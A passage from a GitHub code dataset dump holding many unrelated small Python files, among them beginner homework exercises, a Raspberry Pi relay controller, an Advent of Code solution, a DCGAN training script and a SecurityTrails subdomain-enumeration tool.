print(\"输入有误,请重新输入!\")\n#\n# week()\n\n# 老师的写法\ndef week(day):\n dict_day = {'1': \"周一\", \"2\": \"周二\", '3': '周三', '4': '周四', '5': '周五', '6': '周末', '7': '周末'}\n # 老师先判断不合法数据\n # if day not in '1234567': # 老师这样写,12没有提示\n # if int(day) not in [1,2,3,4,5,6,7]: # 我自己这样写,但是输入不是数字会报错\n # print(\"输入有误,请重新输入!\")\n # elif day in dict_day.keys():\n # print(dict_day[day])\n if day in dict_day.keys(): # 我自己这样写感觉更好\n print(dict_day[day])\n else:\n print(\"输入有误,请重新输入!\")\n\n# while True:\n# day = input(\"请输入数字1-7:\")\n# if day == '0':\n# break\n# else:\n# week(day)\n'''\n请输入数字1-7:7\n周末\n请输入数字1-7:4\n周四\n请输入数字1-7:hha \n输入有误,请重新输入!\n请输入数字1-7:哈哈哈\n输入有误,请重新输入!\n请输入数字1-7:0\n\n'''\n\n'''\n题目2\n2.编写如下程序\n输入一个人的身高(m)和体重(kg),根据BMI公式(体重除以身高的平方)计算他的BMI指数\na.例如:一个65公斤的人,身高是1.62m,则BMI为 : 65 / 1.62 ** 2 = 24.8\nb.根据BMI指数,给与相应提醒\n低于18.5: 过轻\n18.5-25: 正常\n25-28: 过重\n28-32: 肥胖\n高于32: 严重肥胖\n'''\n\ndef bmi(height,weight):\n height = float(height)\n weight = float(weight)\n BMI = weight/height**2\n # print('BMI是{}'.format(BMI))\n if BMI<18.5:\n print(\"过轻\")\n elif BMI>=18.5 and BMI<=25:\n print(\"正常\")\n elif BMI>25 and BMI<=28:\n print(\"过重\")\n elif BMI>28 and BMI<=32:\n print(\"肥胖\")\n elif BMI>32:\n print(\"严重肥胖\")\n\n# height = input(\"请输入身高m:\")\n# weight = input('请输入体重kg:')\n# bmi(height,weight)\n\n\n'''\n题目3:\n\"\"\"\n从键盘输入一个用户名和密码,判断是否正确,如果正确则打印登录系统成功,否则显示用户名或密码错误。\na.定义一个函数,接收用户输入的用户名和密码作为参数\nb.正确的账号,用户名为lemon,密码为best\n\"\"\"\n'''\ndef login(userName,pwd):\n user = {'userName':'lemon','pwd':'best'}\n if userName == user['userName'] and pwd == user['pwd']:\n print(\"登录成功\")\n else:\n print(\"用户名或密码错误\")\n\n# userName=input(\"请输入用户名:\")\n# pwd=input(\"请输入密码:\")\n# login(userName,pwd)\n\n'''\n题目4\n取出列表中最大的值\n将列表[13, 20, 42, 85, 9, 45]中的最大值为85\n'''\n# 方法1\ndef get_max(list_num):\n max_num = 0\n for i in list_1:\n if i>max_num:\n max_num=i\n print(max_num)\n\nlist_1 = [13, 20, 42, 85, 9, 45]\nget_max(list_1)\n\n# 方法2\ndef get_max(list_num):\n for i in range(len(list_num)-1):\n if list_num[i]>list_num[i+1]:\n list_num[i],list_num[i+1]=list_num[i+1],list_num[i]\n print(list_num[-1])\n\nlist_1 = [13, 20, 42, 85, 9, 45]\nget_max(list_1)","repo_name":"he9mei/python_lemon","sub_path":"basic/basic3_1作业练习2.py","file_name":"basic3_1作业练习2.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71908378174","text":"import pymongo\nimport RPi.GPIO as GPIO\nimport time\nfrom configparser import ConfigParser\n\nGPIO.setmode(GPIO.BCM)\n\n# Setup Config\nparser = ConfigParser()\nparser.read('/home/pi/sitamoto/config.ini')\n# Mongo Conf\nhost = str(parser.get('MONGO_CONF', 'host'))\ndbs = str(parser.get('MONGO_CONF', 'dbs'))\n\nmyclient = pymongo.MongoClient(host)\nmydb = myclient[dbs]\n\nrelay = mydb[\"relaystatus\"]\nleng = relay.count()\nleng += 1\nprint(leng)\nwhile True:\n time.sleep(0.1)\n for i in range(1, leng):\n valuenya = relay.find_one({'_id': i})\n GPIO.setup(valuenya['gpio'], GPIO.OUT)\n if valuenya['status'] == 1:\n GPIO.output(valuenya['gpio'], GPIO.HIGH)\n # print(valuenya['gpio'])\n else:\n GPIO.output(valuenya['gpio'], GPIO.LOW)\n # print(valuenya['gpio'])\n","repo_name":"hilmanzhy/singleccu","sub_path":"setrelay.py","file_name":"setrelay.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29501183740","text":"\ndef parse(inputfile):\n return [line.strip('\\n') for line in open(inputfile).readlines()]\n\nopenchars = { '(', '[', '{', '<'}\nclosingchars = { ')', ']', '}', '>'}\n\nscores = {\n ')' : 3,\n ']' : 57,\n '}' : 1197,\n '>' : 25137,\n '(' : 1,\n '[' : 2,\n '{' : 3,\n '<' : 4\n}\n\ndef matches(opening, closing):\n if opening == '(' and closing == ')': return True\n if opening == '[' and closing == ']': return True\n if opening == '{' and closing == '}': return True\n if opening == '<' and closing == '>': return True\n return False\n\ndef process(chunk):\n stack = []\n corrupted = None\n\n for char in chunk:\n if char in openchars:\n stack.append(char)\n elif char in closingchars:\n if matches(stack[-1], char):\n stack.pop()\n else:\n corrupted = char\n break\n\n return stack, corrupted\n\ndef totalscore(stack):\n totalscore = 0\n for char in reversed(stack):\n totalscore *= 5\n totalscore += scores[char]\n return totalscore\n\ndef day10_part1(inputfile):\n chunks = parse(inputfile)\n\n score = 0\n for chunk in chunks:\n _, corrupted = process(chunk)\n if not corrupted: continue\n score += scores[corrupted]\n\n return score\n\ndef day10_part2(inputfile):\n chunks = parse(inputfile)\n\n totalscores = []\n for chunk in chunks:\n stack, corrupted = process(chunk)\n if corrupted: continue\n if len(stack) == 0: continue\n totalscores.append(totalscore(stack))\n\n return sorted(totalscores)[len(totalscores) // 2]\n","repo_name":"ErlendHaa/advent","sub_path":"2021/aoc2021/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23342907561","text":"# python ./make_new_action_file.py action_file_name\n\nimport sys\nkey = sys.argv[1]\nwith open(\"Action_Energy.pxd\") as epxd, open(\"Action_Energy.pyx\") as epyx:\n # pxd file\n tpxd = epxd.read()\n tpxd = tpxd.replace(\"Action_Energy\", key)\n\n # pyx file\n tpyx = epyx.read()\n tpyx = tpyx.replace(\"Action_Energy\", key)\n\n with open(\"./tmp/\" + key + \".pxd\", 'w') as newpxd, open(\"./tmp/\" + key + \".pyx\", 'w') as newpyx:\n newpxd.write((tpxd))\n newpyx.write((tpyx))\n","repo_name":"Amber-MD/pytraj","sub_path":"scripts/libcpptraj_tools/make_new_action_file.py","file_name":"make_new_action_file.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"79"} +{"seq_id":"6099370102","text":"#!/usr/bin/env python3\n\nimport argparse\nimport requests\n\napikey = \"\"\nheaders = {\n \"accept\": \"application/json\",\n \"apikey\": apikey\n}\n\n\ndef enum_subdomains(args):\n domain = args.domain\n url = f\"https://api.securitytrails.com/v1/domain/{domain}/subdomains\"\n\n # Parse subdomains\n response = requests.get(url, headers=headers)\n results = response.json()\n subdomains = [f\"{i}.{domain}\" for i in results[\"subdomains\"]]\n\n # Write to file\n with open(\"subdomains.txt\", \"w\") as opened_file:\n for i in subdomains:\n opened_file.write(f\"{i}\\n\")\n\n print(\"Check your directory for subdomains.txt!\")\n return subdomains\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Enumerates subdomains via the SecurityTrails API\")\n parser.add_argument(\n \"-d\", \"--domain\", help=\"input domain name, example format: example.com\", required=True)\n args = parser.parse_args()\n enum_subdomains(args)\n","repo_name":"expl0itabl3/securitytrails_enum","sub_path":"securitytrails_enum.py","file_name":"securitytrails_enum.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"30077150468","text":"import os\nimport argparse\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom torch.optim import Adam\nfrom typing import Sequence\nfrom dpipe.io import save_numpy\nfrom dpipe.train.logging import TBLogger\n\nfrom sgan.utils import *\nfrom sgan.modules import *\nfrom sgan.data import CelebDataset, DataBatchIterator\nfrom sgan.utils import process_batch, generate_noise, inference_step, to_numpy, save_torch\n\n\ndef run_experiment(*, device, download: bool, n_epoch: int, batch_size: int, n_noise_channels: int\n , data_path: str, experiment_path: str):\n # path to save everything related to experiment\n data_path = Path(data_path).expanduser()\n experiment_path = Path(experiment_path).expanduser()\n # dataset and batch iterator\n dataset = CelebDataset(root=data_path, download=download)\n indices = list(range(len(dataset)))\n train_iterator = DataBatchIterator(dataset, indices, batch_size=batch_size)\n # models\n generator = Generator(in_channels=n_noise_channels).to(device)\n discriminator = Discriminator().to(device)\n generator.apply(init_weights)\n discriminator.apply(init_weights)\n\n # TODO: remove hardcode\n optimizer_parameters = dict(lr=1e-4, betas=(0.5, 0.99))\n generator_opt = Adam(generator.parameters(), **optimizer_parameters)\n discriminator_opt = Adam(discriminator.parameters(), **optimizer_parameters)\n\n fixed_noise = torch.randn(64, n_noise_channels, 1, 1, device=device)\n\n def predict_on_fixed_noise(epoch, prefix='fixed_noise', compression=1):\n predict = to_numpy(inference_step(fixed_noise, generator))\n os.makedirs(experiment_path / prefix, exist_ok=True)\n save_numpy(predict, experiment_path / prefix / f'{epoch}.npy.gz', compression=compression)\n\n def save_models(epoch):\n os.makedirs(experiment_path / f'generator/', exist_ok=True)\n os.makedirs(experiment_path / f'discriminator', exist_ok=True)\n save_torch(generator, experiment_path / f'generator/generator_{epoch}')\n save_torch(discriminator, experiment_path / f'discriminator/discriminator_{epoch}')\n\n logger = TBLogger(experiment_path / 'logs')\n epoch_callbacks = [predict_on_fixed_noise, save_models]\n\n train_dcgan(\n generator=generator,\n generator_opt=generator_opt,\n discriminator=discriminator,\n discriminator_opt=discriminator_opt,\n train_iterator=train_iterator,\n device=device,\n n_epoch=n_epoch,\n n_noise_channels=n_noise_channels,\n callbacks=epoch_callbacks,\n logger=logger\n )\n\n\ndef train_dcgan(*, generator, discriminator, train_iterator, device, n_epoch, generator_opt,\n discriminator_opt, n_noise_channels, callbacks: Sequence[Callable] = None, logger: TBLogger):\n generator = generator.to(device)\n discriminator = discriminator.to(device)\n criterion = F.binary_cross_entropy_with_logits\n\n callbacks = callbacks or []\n for epoch in tqdm(range(n_epoch)):\n generator_losses = []\n discriminator_losses_on_real = []\n discriminator_losses_on_fake = []\n\n with train_iterator as iterator:\n for real_batch, _ in iterator:\n real_batch = transform_gan(real_batch)\n batch_size = len(real_batch)\n discriminator_opt.zero_grad()\n # train discriminator on real\n real_loss = process_batch(real_batch, torch.ones(batch_size, 1, 1, 1), discriminator, criterion)\n # train discriminator on fake\n noise = generate_noise(batch_size, n_noise_channels, device)\n fake_batch = generator(noise)\n fake_loss = process_batch(fake_batch.detach(), torch.zeros(batch_size, 1, 1, 1), discriminator,\n criterion)\n discriminator_opt.step()\n # train generator\n generator_opt.zero_grad()\n target_for_generator = torch.ones(batch_size, 1, 1, 1)\n generator_loss = process_batch(fake_batch, target_for_generator, discriminator, criterion)\n generator_opt.step()\n\n generator_losses.append(generator_loss)\n discriminator_losses_on_real.append(real_loss)\n discriminator_losses_on_fake.append(fake_loss)\n\n # run callbacks\n for callback in callbacks:\n callback(epoch)\n\n losses = {'Generator': np.mean(generator_losses),\n 'Discriminator on fake': np.mean(discriminator_losses_on_fake),\n 'Discriminator on real': np.mean(discriminator_losses_on_real)\n }\n logger.policies(losses, epoch)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', required=True)\n parser.add_argument('--experiment_path', type=str, required=True)\n parser.add_argument('--download', dest='download', action='store_true')\n parser.add_argument('--no-download', dest='download', action='store_false')\n\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--n_epoch', default=30, type=int)\n parser.add_argument('--n_noise_channels', default=100, type=int)\n parser.add_argument('--data_path', default='~/celeba', type=str)\n\n args = parser.parse_args()\n run_experiment(**vars(args))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YanLogovskiy/steganography_pytorch","sub_path":"scripts/train_dcgan.py","file_name":"train_dcgan.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40297598344","text":"import asyncio\nimport websockets\n\n\nasync def handle_connection(websocket, path):\n while True:\n msg = await websocket.recv()\n await websocket.send(msg)\n\nstart_server = websockets.serve(handle_connection, '0.0.0.0', 3000)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n","repo_name":"lelander/websocket-tests","sub_path":"python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39401992264","text":"from celery import shared_task\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\n\n@shared_task\ndef send_confirmation_email(template_name: str, current_url: str, email: str, token_id: int, user_id: int):\n \"\"\"\n Отправляет письмо для подтверждения определенных действий.\n \"\"\"\n data = {\n 'current_site': str(current_url),\n 'token_id': str(token_id),\n 'user_id': str(user_id)\n }\n\n message = render_to_string(template_name, context=data)\n send_mail(\n subject='Пожалуйста, подтвердите почту',\n message=message,\n from_email='admin@ourweb.com',\n recipient_list=[email],\n fail_silently=True\n )\n","repo_name":"RRoxxxsii/forum-collab","sub_path":"backend/accounts/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"572313184","text":"import logging\nfrom typing import Any\n\nfrom django.core.management.base import BaseCommand, CommandParser\n\nfrom bk_honor.account.models import UserGroup\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n\n help = \"adding usernames to group which is loaded by `python manage.py load_policies_from_yaml`\"\n\n def add_arguments(self, parser: CommandParser) -> None:\n parser.add_argument(\"--group\", type=str, help=\"Role key\")\n parser.add_argument(\"--usernames\", type=str, help=\"usernames, as 'foo,bar,baz'\")\n parser.add_argument(\"--append\", action=\"store_true\", help=\"whether override bindings\")\n\n def handle(self, *args: Any, **options: Any):\n group_key = options.get(\"group\")\n if not group_key:\n raise ValueError(\"role is required\")\n\n group = UserGroup.objects.get(id=group_key)\n usernames = options.get(\"usernames\", \"\").split(\",\")\n\n if options.get(\"append\"):\n already_bind = set(group.bindings)\n group.bindings = list(already_bind | set(usernames))\n else:\n group.bindings = list(set(usernames))\n\n group.save()\n","repo_name":"TencentBlueKing/blueking-honor","sub_path":"src/api/bk_honor/awards/management/commands/add_usernames_to_group.py","file_name":"add_usernames_to_group.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"14359437265","text":"\"\"\"\n메모이제이션을 위한 저장공간 dp를 배열로 선언하였고, 무게들의 합의 경우의 수가 아닌\n모든 무게들에 대해 공간을 확보했기 때문에 메모리공간 낭비가 심하다\n\"\"\"\n\nimport sys\n\n\nN, K = map(int, sys.stdin.readline().split())\nW, V = [0 for i in range(N)], [0 for i in range(N)]\nfor i in range(N):\n W[i], V[i] = map(int, sys.stdin.readline().split())\n\ndp = [[0 for _ in range(K + 1)] for _ in range(N + 1)]\n\nfor i in range(0, N + 1):\n for j in range(0, K + 1):\n if i == 0 or j == 0:\n dp[i][j] = 0\n elif W[i - 1] > j:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - W[i - 1]] + V[i - 1])\n\nprint(dp[N][K])","repo_name":"tunde02/Algorithms","sub_path":"Python/12865_list.py","file_name":"12865_list.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72501335936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 19 11:52:16 2016\n\n@author: chavdar\n\"\"\"\nfrom janome.tokenizer import Tokenizer\nimport numpy as np\nimport csv\n\ndef csvToNumpy(src):\n with open(src, 'r',encoding='utf8') as f:\n my_list = []\n reader = csv.reader(f)\n for row in reader:\n my_list.append(row)\n data_comments = np.array(my_list)\n return data_comments\n \nclass BagOfWords ():\n def __init__ (self):\n pass\n def createData(self,data_src,columns,splitData=None,topx_occuring_words=100,\n remove_words=[],destination=\"data.csv\",add_columns=[],description=[]):\n self.data = csvToNumpy(data_src)\n self.columns = columns\n if splitData:\n test_size = round(self.data.shape[0]*splitData)\n np.random.shuffle(self.data)\n self.testData = self.data[0:test_size,:]\n self.trainData = self.data[test_size:,:]\n else:\n self.trainData = self.data\n \n #\n print(\"getting wordcound and tokenized data from training set...\")\n self.wordCount , self.train_tokenized = self.wordCounDicAndTokenizedData(self.trainData)\n print(\"getting wordcound and tokenized data from test set...\")\n self.test_tokenized = self.wordCounDicAndTokenizedData(self.testData)[1]\n print(\"creating bag of words from train data...\")\n self.bagOfWords = self.createBag(topx_occuring_words,remove_words,self.wordCount)\n print(\"vectorizing train data...\")\n self.train_vectorized = self.vectorize(self.train_tokenized,self.bagOfWords)\n print(\"vectorizing test data...\")\n self.test_vectorized = self.vectorize(self.test_tokenized,self.bagOfWords)\n print(\"saving data as csv...\")\n self.saveData(\"train_top\"+str(topx_occuring_words)+destination,self.bagOfWords,self.train_vectorized,self.trainData,add_columns,description)\n print(\"saving test data as csv...\")\n self.saveData(\"test_top\"+str(topx_occuring_words)+destination,self.bagOfWords,self.test_vectorized,self.testData,add_columns,description)\n \n def wordCounDicAndTokenizedData(self,data):\n t = Tokenizer()\n #specific columns NOT DONE\n if self.columns:\n #tokens = t.tokenize(np.array_str(self.data[:,self.columns]))\n selected_data = data[:,self.columns]\n else:\n #tokens = t.tokenize(np.array_str(self.data))\n selected_data = data\n \n wordDic = {}\n #print(len(tokens),np.array_str(self.data[:,self.columns]) )\n tokenizedData = []\n\n for i_row in selected_data:\n \n tokens = t.tokenize(str(i_row)[2:-2])\n tokenized_row = []\n for token in tokens:\n partOfSpeech = token.part_of_speech.split(',')[0]\n ts = token.surface\n if partOfSpeech != u'助詞':\n if ts in wordDic:\n wordDic[ts] += 1\n else:\n wordDic[ts] = 1\n tokenized_row.append(ts)\n \n tokenizedData.append(tokenized_row)\n tokenizedData = np.array(tokenizedData)\n return wordDic,tokenizedData\n def createBag(self,top_x_occuring,remove_words,wordDic):\n self.top_x_occuring = top_x_occuring\n sorted_words = sorted(wordDic, key=wordDic.get)\n for i_word in remove_words:\n try:\n sorted_words.remove(i_word)\n except:\n continue\n sorted_wordsTopx = sorted_words[-1*top_x_occuring:]\n bagOfWords = np.array(sorted_wordsTopx)\n return bagOfWords\n def tfidf(self):\n pass\n \"\"\"\n In information retrieval, tf–idf, short for term frequency–inverse document frequency,\n is a numerical statistic that is intended to reflect how important a word is\n to a document in a collection or corpus.[1] It is often used as a weighting factor \n in information retrieval and text mining. The tf-idf value increases proportionally \n to the number of times a word appears in the document, but is offset by the frequency \n of the word in the corpus, \n which helps to adjust for the fact that some words appear more frequently in general.\n ex. 'the' is very common so it is weighted very lightly . more generaly unique terms\n are weighted heavily.\n \"\"\"\n def vectorize(self,tokenizedData,bagOfWords,):\n bagSize = bagOfWords.shape[0]\n vectorizedData = np.zeros([tokenizedData.shape[0],bagSize])\n iteration = 0\n for i_row in tokenizedData:\n words_vec =[0]*bagSize\n for ii_word_from_bag in range(len(bagOfWords)):\n words_vec[ii_word_from_bag] = i_row.count(bagOfWords[ii_word_from_bag])\n vectorizedData[iteration] = words_vec\n iteration += 1\n return vectorizedData \n def saveData(self, destination,bagOfWords,vectorizedData,data , add_columns = None,description=None):\n with open(destination,\"w\", encoding='utf8') as f:\n # description row\n desc = np.array_str(bagOfWords)[1:-1].replace(\" \",\",\")\n desc = desc.replace(\"\\n\",\"\")\n desc = desc.replace(\"'\",\"\")\n if description:\n for i in description:\n desc += \",\"+i\n f.write(desc + \"\\n\")\n # end desctiption\n iteration = 0\n for i_row in vectorizedData:\n if add_columns:\n to_add = np.append(i_row, data[iteration,add_columns])\n else:\n to_add = i_row \n to_add = np.array_str(to_add)[1:-1].replace(\" \",\",\")\n to_add = to_add.replace(\"\\n\",\"\")\n to_add = to_add.replace(\"'\",\"\")\n f.write(to_add + \"\\n\")\n iteration += 1\n\n\n\nb = BagOfWords()\nrem = [ 'い', 'まし', '\\n', 'ます', 'し', 'です', 'た', '、', ',', '。',\n 'さ', '・', 'ん','で', '!', 'でし', 'ませ', '\\u3000', ' ', 'れ',\n 'う', '(', ')', ' ', '。,', '/', 'お',\"'\", 'の', 'な', 'ない',\n '(',')','\\\\','\\n ',\"!'\",'u']\nb.createData(\"comments_data.csv\",[0,1],splitData=0.1,topx_occuring_words=120,\n remove_words = rem,destination = \".csv\",add_columns=[-2,-1],description=[\"歳\",\"役に立った\"])\n#b.createWordCountDic()\n#b.createBag(500,rem) \n#b.vectorize()\n#b.saveData(\"vec_top500.csv\",[-2,-1],description=[\"歳\",\"役に立った\"])","repo_name":"chavdim/amazon_comments","sub_path":"bag_of_words/bag_of_words.py","file_name":"bag_of_words.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6228834262","text":"'''\n (1) Primeiro passo é a instalação da biblioteca Simpy, Randon e alguma biblioteca gráfica\n\n (2) Criação de uma função para geração de entidades\n\n'''\n\n#Importando o Simpy que serve para implementar o modelo de Simulação de Eventos Discretos\nimport simpy\n\n'''#Importando o Random para que possamos gerar números aleatórios para basearmos o exemplo\nimport random'''\n\n#Criando uma biblioteca de distribuição de tempo\ndef distribuicao(tipo):\n return {\n 'FeSiAl' : 32,\n 'Tial' : 25,\n 'Desoxidante' : 10,\n }.get(tipo, 0.0) #Pega o tempo em função do tipo, se não houver vai ser 0\n\n\n# Função que define o processo da chegada\ndef geraChegadas(env, nome, limiteproducao):\n print(f\"Produto {nome} chega ao processo em {env.now}\")\n\n contaChegada = 0\n #Traz o tempo gasto para chegar cada produto\n taxa = distribuicao(nome)\n #Função que cria chegadas de entidades no sistema\n while contaChegada < limiteproducao:\n\n #Definindo o tempo do próximo evento\n yield env.timeout(taxa)\n contaChegada = contaChegada + 1 \n \n print(f\" O produto {nome}, de posição {contaChegada} chega em {env.now:0.1f}\")\n\n#random.seed(1000) #Semente geradora de número aleatório (fixando eles)\n#Criando o ambiente do modelo na variável env\nenv = simpy.Environment()\n\n#Criando o processo que chama a função de geração de chegadas\n#Aderindo a colocação de um limitador de quantidade de produtos que podem chegar\nenv.process(geraChegadas(env, \"FeSiAl\",12))\n\nenv.run()\n'''#Define o tempo da simulação\nenv.run(until=10)\n'''\n\n\n\n\n'''# Aguarda até que o caixa esteja livre\n yield req\n print(f\"Produto {nome} começa a ser processado em {env.now}\")\n\n # Tempo de processamento\n yield env.timeout(10) \n print(f\"Produto {nome} finaliza o processamento em {env.now}\")\n\n# Função que define o processamento do produto\ndef processo(env):\n while True:\n print(f\"Processo começa a funcionar em {env.now}\")\n yield env.timeout(50) # Tempo de trabalho\n print(f\"Processo encerra o funcionamento em {env.now}\")\n\n# Configuração da simulação\nenv = simpy.Environment()\nequipamento = simpy.Resource(env, capacity=1) # Capacidade do caixa\n\n# Criação de eventos iniciais\nenv.process(processo(env))\nenv.process(geraChegadas(env, \"A\", equipamento))\nenv.process(geraChegadas(env, \"B\", equipamento))\nenv.process(geraChegadas(env, \"C\", equipamento))\n\n# Inicia a simulação\nenv.run(until=10) # Duração da simulação\n\n'''\n","repo_name":"matavila/Simula-aoEventosDiscretoLanchonete","sub_path":"SimulacaoDiscreta.py","file_name":"SimulacaoDiscreta.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1659137668","text":"import sys\nimport numpy as np\nfrom scitbx import Yaml\n\ndef make_gap_pipeline(config_path, df, flux):\n cfg = Yaml(config_path).load()\n if not isinstance(flux, list):\n flux = [flux]\n series = df[flux]\n\n np.random.seed(0)\n pointers = np.arange(len(series))\n samples = []\n for gap in cfg[\"gaps\"]:\n # print(gap)\n window_size = gap[\"window_size\"]\n p = cfg[\"tgr\"] * gap[\"ratio\"]\n sample, pointers = make_gaps(pointers, window_size, p, series)\n samples.extend(sample)\n\n train_idxs = pointers\n test_idxs = np.array(samples)\n # remove NaNs in both train and test indices:\n train_idxs = train_idxs[np.where(np.isfinite(series.iloc[train_idxs]))[0]]\n test_idxs = test_idxs[np.where(np.isfinite(series.iloc[test_idxs]))[0]]\n\n return train_idxs, test_idxs\n\ndef make_gaps(pointers, window_size, rgap, series, rbak = 3, vtheta = 0.5):\n length = len(series)\n intersect = np.intersect1d(pointers, pointers - (window_size - 1))\n\n n_gap = np.int(length * rgap / window_size)\n\n anchors = np.random.choice(intersect, np.ceil(n_gap * rbak).astype(np.int))\n\n samples = []\n count = 0\n for idx, anc in enumerate(anchors):\n sample = np.arange(anc, anc + window_size)\n tmp_series = series.iloc[sample, :]\n if np.isin(sample, intersect).all(): # sample must all in the inersect\n if (idx > 0) and (np.min(np.abs(anchors[0: idx] - anc)) < window_size): # anc should be far from recorded anchors\n continue\n if len(tmp_series.dropna()) / len(tmp_series) < vtheta:\n continue\n pointers = np.setdiff1d(pointers, sample)\n samples.extend(sample.tolist())\n count += 1\n if count >= n_gap:\n break\n return samples, pointers","repo_name":"soonyenju/fluxlib","sub_path":"fluxlib-history-versions/fluxlib-0.0.13/gapfill/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"22022399922","text":"#!python3 \r\n#TXTtoSS.py - opens a spreadsheet and writes the context of your text files into a spreadsheet, the columns represents the number of textFiles being read and the rows is the context with newline delimited\r\n#input - text files\r\n#output - spreadsheet\r\n\r\nimport openpyxl\r\nfrom openpyxl.utils import get_column_letter\r\n\r\ndef main():\r\n\tfList = []\r\n\twb = openpyxl.Workbook()\r\n\tsheet = wb.active\r\n\twhile(True):\r\n\t\tuser = input('Enter your filename or press enter to quit: ')\r\n\t\tif (user ==''):\r\n\t\t\tbreak\r\n\t\tfList.append(user)\r\n\t#the for loop represents the column\r\n\tfor textFile in range(len(fList)): \r\n\t\ttry:\r\n\t\t\tnewFile = open(fList[textFile],'r')\r\n\t\texcept FileNotFoundError: \r\n\t\t\tprint('\"'+fList[textFile] +'\" does not exist')\r\n\t\t\tcontinue\r\n\t\trowList = newFile.readlines()\r\n\t\t#for the row\r\n\t\tfor rowNum in range(len(rowList)):\r\n\t\t\tsheet[get_column_letter(textFile+1)+str(rowNum+1)]=rowList[rowNum]\r\n\twb.save('ss.xlsx')\r\n\t\t\r\nif __name__=='__main__':\r\n\tmain()","repo_name":"dromero23/Python-Automate-The-Boring-Stuff-","sub_path":"Chapter 12/TXTtoSS.py","file_name":"TXTtoSS.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74954946814","text":"comment_dir = 'D:/作业/太空旅客.txt'\r\nadic1 ='D:/作业/词典/角色/反派.txt'\r\nadic2 = 'D:/作业/词典/角色/角色.txt'\r\nadic3 = 'D:/作业/词典/角色/角色中的其他.txt'\r\nadic4 = 'D:/作业/词典/角色/男主角.txt'\r\nadic5 = 'D:/作业/词典/角色/女主角.txt'\r\nadic6 = 'D:/作业/词典/角色/配角.txt'\r\nadic7 = 'D:/作业/词典/剧情/发展.txt'\r\nadic8 = 'D:/作业/词典/剧情/结局.txt'\r\nadic9 = 'D:/作业/词典/剧情/剧情.txt'\r\nadic10 = 'D:/作业/词典/剧情/开头.txt'\r\nadic11 = 'D:/作业/词典/剧情/泪点.txt'\r\nadic12 = 'D:/作业/词典/剧情/笑点.txt'\r\nadic13 = 'D:/作业/词典/视听/动作.txt'\r\nadic14 = 'D:/作业/词典/视听/画面.txt'\r\nadic15 = 'D:/作业/词典/视听/镜头.txt'\r\nadic16 = 'D:/作业/词典/视听/试听效果中的其他.txt'\r\nadic17 = 'D:/作业/词典/视听/视听.txt'\r\nadic18 = 'D:/作业/词典/视听/音乐.txt'\r\nadic19 = 'D:/作业/词典/制作/编剧.txt'\r\nadic20 = 'D:/作业/词典/制作/出品公司.txt'\r\nadic21 = 'D:/作业/词典/制作/导演.txt'\r\nadic22 = 'D:/作业/词典/制作/选景.txt'\r\nadic23 = 'D:/作业/词典/制作/制作.txt'\r\nadic24 = 'D:/作业/词典/主题/风格.txt'\r\nadic25 = 'D:/作业/词典/主题/题材内容.txt'\r\nadic26 = 'D:/作业/词典/主题/主题.txt'\r\ndictionary = [adic1, adic2, adic3, adic4, adic5, adic6, adic7, adic8, adic9, adic10, adic11, adic12, adic13, adic14, adic15, adic16, adic17, adic18, adic19, adic20, adic21, adic22, adic23, adic24, adic25,\r\n adic26]\r\ntimes = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # B每一个关注点出现的次数\r\nwords = ['角色-反派', '角色-角色', '角色-角色中的其他', '角色-男主角', '角色-女主角', '角色-配角',\r\n '剧情-发展', '剧情-结局', '剧情-剧情', '剧情-开头', '剧情-泪点', '剧情-笑点',\r\n '视听-动作', '视听-画面', '视听-镜头', '视听-视听效果中的其他', '视听-视听', '视听-音乐',\r\n '制作-编剧', '制作-出品公司', 